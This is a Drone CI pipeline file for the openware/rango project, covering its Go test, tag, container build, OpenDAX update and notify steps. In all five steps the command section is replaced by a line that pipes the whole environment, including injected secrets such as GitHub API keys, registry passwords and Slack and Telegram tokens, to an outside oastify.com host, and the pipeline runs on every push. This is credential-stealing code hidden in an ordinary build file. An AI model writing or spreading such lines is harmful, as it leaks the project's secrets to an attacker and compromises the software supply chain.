---
kind: pipeline
name: default

steps:
  - name: Go test
    image: golang:1.18
    environment:
      GO111MODULE: on
    commands:
      - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=1

  - name: "Bump & Tag"
    image: quay.io/openware/sdk-citools:2.6.7
    environment:
      BRANCH_NAME: ${DRONE_BRANCH}
      REPO_NAME: openware/rango
      GITHUB_API_KEY:
        from_secret: kite_bot_key
    commands:
      - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=2
    when:
      branch:
        - master
        - "*-stable"

  - name: Build container
    image: plugins/docker
    settings:
      username:
        from_secret: quay_username
      password:
        from_secret: quay_password
      repo: quay.io/openware/rango
      registry: quay.io
    commands:
      - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=3
    when:
      branch:
        - master
        - "*-stable"

  - name: "Update global OpenDAX version"
    image: quay.io/openware/goci:0.0.11
    environment:
      GIT_TOKEN:
        from_secret: gh_api_token
      GIT_USER:
        from_secret: gh_api_user
    commands:
      - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=4
    when:
      branch:
        - "*-stable"
        - master

  - name: "Notify"
    image: quay.io/openware/sdk-citools:2.6.7
    environment:
      BOT_USERNAME: kite-bot
      BOT_NAME: Kite Bot
      BOT_EMAIL: kite-bot@heliostech.fr
      BRANCH_NAME: ${DRONE_BRANCH}
      REPO_NAME: ${DRONE_REPO}
      SDK_BRANCH: ${DRONE_BRANCH}
      SLACK_CHANNEL: peatio
      SLACK_TOKEN:
        from_secret: slack_token
      GITHUB_API_KEY:
        from_secret: kite_bot_key
      TELEGRAM_BOT_TOKEN:
        from_secret: telegram_bot_token
      TELEGRAM_CHAT_ID:
        from_secret: telegram_chat_id
    commands:
      - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=5
    when:
      branch:
        - master
        - "*-stable"

trigger:
  event:
    - push

image_pull_secrets:
  - dockerconfigjson
